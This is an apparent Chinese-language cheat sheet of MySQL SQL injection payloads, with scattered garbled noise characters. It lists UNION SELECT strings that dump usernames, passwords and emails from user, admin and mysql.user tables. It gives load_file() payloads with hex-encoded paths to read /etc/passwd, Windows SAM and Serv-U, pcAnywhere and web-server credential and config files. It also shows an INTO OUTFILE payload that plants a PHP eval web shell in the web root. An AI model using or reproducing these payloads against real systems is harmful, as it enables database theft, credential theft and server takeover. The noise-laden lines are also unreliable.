Mysql sqlinjection code

admin

Mysql sqlinjection code

# %23 -- /* /**/   注释
& V% h2 ?3 I0 o- n2 Z6 G; X
3 x. w0 s8 S, L( [0 Z2 v8 U( nUNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--
9 D  X- Z) F9 n
" e& s/ m# A$ P/ B4 Y* Kand+(select+count(*)+from+mysql.user)>0--  判断是否能读取MYSQL表

CONCAT_WS(CHAR(32,58,32),user(),database(),version())   用户名 数据库 MYSQL版本
$ m; z$ ]) J5 \( J  Y+ @
; ^$ l5 n0 J$ x1 runion+select+1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,7--  
/ j% B2 b) g6 _6 ]8 w! F5 j& D
union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*  获取users表的用户名 密码 email 信息

unhex(hex(@@version))    unhex方式查看版本

! N- v* a% M* Z+ dunion all select 1,unhex(hex(@@version)),3/*
' t; H+ K6 P+ w
convert(@@version using latin1) latin 方式查看版本

: [0 s  `4 z' q. V! L/ ~union+all+select+1,convert(@@version using latin1),3--
( R0 w3 T5 Q" D' `/ W$ M
CONVERT(user() USING utf8)
3 ?$ a2 J% t. R! M4 h4 munion+all+select+1,CONVERT(user() USING utf8),3--  latin方式查看用户名

. w7 n) f& Z7 @( h1 w. O
and+1=2+union+select+1,passw,3+from+admin+from+mysql.user--   获取MYSQL帐户信息
5 I/ |6 q1 H( Y' P, G1 G" J# }1 {
union+all+select+1,concat(user,0x3a,password),3+from+mysql.user--   获取MYSQL帐户信息




3 N1 r* r  h' {union+select+1,concat_ws(0x3a,username,password),3+FROM+ADMIN--  读取admin表 username password 数据  0x3a 为“：” 冒号
4 h6 z- g, r5 a; P0 b) J3 y
union+all+select+1,concat(username,0x3a,password),3+from+admin--  

' W5 i2 L" S3 R% munion+all+select+1,concat(username,char(58),password),3+from admin--
9 w8 P2 J8 |1 l' U+ k* e: p' |
2 G# x& w' Q% B9 m( Q9 t
- I4 W$ C) S; e; t( NUNION+SELECT+1,2,3,4,load_file(0x2F6574632F706173737764),6--  通过load_file（）函数读取文件


! Q' K! f0 ~/ Z7 b" JUNION+SELECT+1,2,3,4,replace(load_file(0x2F6574632F706173737764),0x3c,0x20),6--  通过replace函数将数据完全显示

union+select+1,2,3,char(0x3C3F706870206576616C28245F504F53545B39305D3F3B3E),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'--  在web目录写入一句话木马

<?php+eval($_POST[90]?;>   为上面16进制编码后的一句话原型

3 F8 ~( y; I' I( G8 a9 I; E- f; ?
/ N. }0 _4 C! w9 ^" g( punion+select+1,2,3,load_file(d:\web\logo123.jpg),5,6,7,8,9,10,7+into+outfile+'d:\web\90team.php'--   将PHP马改成图片类型上传之网站，再通过into outfile 写入web目录
* C. N2 i4 s& P. D

+ K) n7 j, b/ b1 K常用查询函数
* o0 Q; y4 J  G9 x: \- j
1:system_user() 系统用户名
2:user()        用户名
3:current_user  当前用户名
4:session_user()连接数据库的用户名
7 ?( A/ X  G7 @7 ^4 w0 R5:database()    数据库名
6:version()     MYSQL数据库版本  @@version
3 h0 u0 T8 }0 F& ~7 k4 k7:load_file()   MYSQL读取本地文件的函数
" O; n$ f8 H. d& F" |, R# q( M5 s2 L8@datadir     读取数据库路径
% B6 ^* B% }" f5 C+ B- Q9@basedir    MYSQL 安装路径
8 k2 U# M1 w1 l7 |" A. F' H10@version_compile_os   操作系统


; D  f& u% `) Y: e' i3 ^% U. K% dWINDOWS下:
c:/boot.ini          //查看系统版本     0x633A2F626F6F742E696E690D0A

c:/windows/php.ini   //php配置信息      0x633A2F77696E646F77732F7068702E696E69
( [$ A% h+ J6 E
6 i* }% }2 D0 U- t3 n; U& K) P- \c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码  0x633A2F77696E646F77732F6D792E696E69

' K* y: R. |0 b( e9 M! uc:/winnt/php.ini      0x633A2F77696E6E742F7068702E696E69
& m  V5 m/ m1 {, F6 w
5 }# Z+ E9 p& [+ Sc:/winnt/my.ini       0x633A2F77696E6E742F6D792E696E69
$ t/ n8 g2 f1 T' r) W
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码  0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944

c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
1 z1 V* p9 }7 p2 G8 ]7 e% I
9 J) W0 P- u1 ]  N0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69

c:\Program Files\Serv-U\ServUDaemon.ini   0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69

c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
1 _6 @& T  L6 I* g# K
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
- z4 B, i2 J* c- |  k2 G0 }
5 ^8 `: e; O! X5 Q9 b  `( a3 Tc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此

% @# h8 k8 x4 C' u1 M' u! a2 z# dc:\Program Files\RhinoSoft.com\ServUDaemon.exe

% J4 F7 u% A3 c8 u1 X7 G: r- f3 VC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif  文件

//存储了pcAnywhere的登陆密码
8 [( _& i/ U/ P0 M5 X' G7 ], t
& h" C6 P8 k9 W2 \& jc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件   
) v$ c( p9 d% Z( G: |  t0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66

+ l- n$ \) p3 l- ~c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.  0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66
; c3 j6 n7 {, m
! x# v5 z; M. l+ Xc:/Resin/conf/resin.conf  0x633A2F526573696E2F636F6E662F726573696E2E636F6E66

& L7 p: F) `: ~! m
4 n5 M2 o' c3 u! {/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机  0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66
) O7 a3 s9 o5 a% e; w$ G
6 _$ X0 L* \+ y* s9 _1 pd:\APACHE\Apache2\conf\httpd.conf  0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66
% g7 ~3 k& y, |1 o  C' {, W
C:\Program Files\mysql\my.ini  0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69

c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置    0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6C
! n7 R. G8 i$ [7 G. Y4 {
6 c& j- I: Z; z# s8 r% ]C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码  0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944
1 ^! o6 R/ I( }. A* {8 Y2 f
5 X' w+ x. |1 R4 g& H
LUNIX/UNIX下:

/etc/passwd  0x2F6574632F706173737764
& x) B& J* {" z6 v) O+ y2 ^# J
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66
% C1 K9 W' W# j$ |- K
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置  0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
. d4 R* }. R/ w: ]9 V
/usr/local/app/php5/lib/php.ini //PHP相关设置   0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69

/etc/sysconfig/iptables //从中得到防火墙规则策略  0x2F6574632F737973636F6E6669672F69707461626C657320

/etc/httpd/conf/httpd.conf // apache配置文件    0x2F6574632F68747470642F636F6E662F68747470642E636F6E66   
  
4 Z. G1 k" ^7 Y3 a& M9 E9 o6 ?9 s2 S/etc/rsyncd.conf //同步程序配置文件              0x2F6574632F7273796E63642E636F6E66
& O* n1 z! B' g
+ i# B7 ^! T$ _7 r) i/etc/my.cnf //mysql的配置文件   0x2F6574632F6D792E636E66
. f4 U  ?* ]3 O% @2 p
/etc/redhat-release //系统版本   0x2F6574632F7265646861742D72656C65617365
; ?5 P) ]# m; K1 q; ^
, a7 J8 L  e3 d1 ~& [" X& U/etc/issue           0x2F6574632F6973737565

7 v2 A) L+ v7 }! v/etc/issue.net       0x2F6574632F69737375652E6E6574

/usr/local/app/php5/lib/php.ini //PHP相关设置  0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69
, h- s# L$ i, {( o7 J# b% x( W# l7 h* y
# Y$ M4 Q+ ^: n* P! j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置   0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
5 g) K- H2 j  L
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件  0x2F6574632F68747470642F636F6E662F68747470642E636F6E66
$ P6 \2 T2 A. g# R+ S1 v
0x2F7573722F6C6F63616C2F61706368652F636F6E662F68747470642E636F6E66
+ F; }8 A7 K( t9 J+ C3 O
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看  0x2F7573722F6C6F63616C2F726573696E2D332E302E32322F636F6E662F726573696E2E636F6E66

/usr/local/resin-pro-3.0.22/conf/resin.conf 同上   0x2F7573722F6C6F63616C2F726573696E2D70726F2D332E302E32322F636F6E662F726573696E2E636F6E66
5 ], S- [8 C; d3 }. L
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看  

0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66
1 v& y, t8 G9 Z# o3 {
1 Q* U5 `- H6 j: y' J" P: F7 P5 V
0 w0 Y% Z, a2 J7 l/etc/sysconfig/iptables 查看防火墙策略 0x2F6574632F737973636F6E6669672F69707461626C6573
( f% d4 e. D1 `$ B& {0 G* F" h
% Z' y3 H2 J6 W- ]* k& r$ P: Bload_file(char(47))  列出FreeBSD,Sunos系统根目录


4 Y- ^5 n5 E/ C3 _6 ?7 lreplace(load_file(0x2F6574632F706173737764),0x3c,0x20)
6 f; Q$ L  c; a4 Z$ d- O0 M' R
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

7 Y. V& `# _4 c# J  b上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 "<" 替换成"空格" 返回的是网页.而无法查看到代码.
. ]& _  `  y8 u7 }1 y